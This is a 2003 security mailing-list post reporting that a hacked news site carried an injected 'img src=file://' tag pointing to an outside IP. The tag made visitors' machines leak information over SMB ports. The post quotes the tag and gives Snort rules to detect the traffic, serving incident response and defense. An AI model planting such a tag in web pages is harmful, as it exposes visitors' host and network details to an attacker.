Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Stopping information leakage

From: "Stark, Vernon L." <Vern.Stark () jhuapl edu>
Date: Tue, 13 May 2003 12:32:38 -0400
        I recently spotted several of our hosts attempting to contact a host
in Korea primarily on TCP ports 139 and 445.  We believe we've run this to
ground.  Our analysis suggests this is due to a news site that has probably
had their web page hacked.  The web page contains the following source code:

<img src=file://210.222.4.129/web.jpg>

Packets captured from one of our hosts indicate that almost immediately
after receiving this content, the host attempts to contact host
210.222.4.129 on port 445 and then on port 139.  Various hosts involved have
also used ports TCP 21 and UDP 137.  According to www.apnic.net,
210.222.4.129 is assigned to the Korea Network Information Center.  When I
e-mailed the owner of the web site, he promptly called me.  He indicated
that he had removed the content shown above and it later reappeared.

        This content at least gives the attacker the ability to see who
visits the web site.  Depending upon the web site with the hacked content,
this may provide the attacker with the ability to harvest a very useful
member list.  Moreover, if ports 139 and 445 are not blocked outbound,
additional information leakage can result since the Korean host (when last
tested) will gladly accept connections on port 139.  A host can report host
name, operating system, domain name, etc.  This emphasizes the importance of
having a policy that denies all traffic except that required.  Such a policy
will generally deny outbound traffic on ports 139 and 445 since this traffic
is generally only appropriate on the intranet.

        The following Snort rules have been used to track this particular
traffic:

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Content 210.222.4.129
spotted.  Korean port 139 host."; content:"210.222.4.129"; )

alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"Content 210.222.4.129
spotted.  Korean port 139 host."; content:"210.222.4.129"; )

alert tcp $HOME_NET any -> $EXTERNAL_NET 139 (msg:"Outgoing port 139
activity"; )

alert tcp $HOME_NET any -> $EXTERNAL_NET 445 (msg:"Outgoing port 445
activity"; )

Vern Stark, GCIA, GSEC
JHU/APL

Any opinions expressed are mine and may not reflect those of my employer.



----------------------------------------------------------------------------
*** Wireless LAN Policies for Security & Management - NEW White Paper ***
Just like wired networks, wireless LANs require network security policies 
that are enforced to protect WLANs from known vulnerabilities and threats. 
Learn to design, implement and enforce WLAN security policies to lockdown enterprise WLANs.

To get your FREE white paper visit us at:    
http://www.securityfocus.com/AirDefense-incidents
----------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: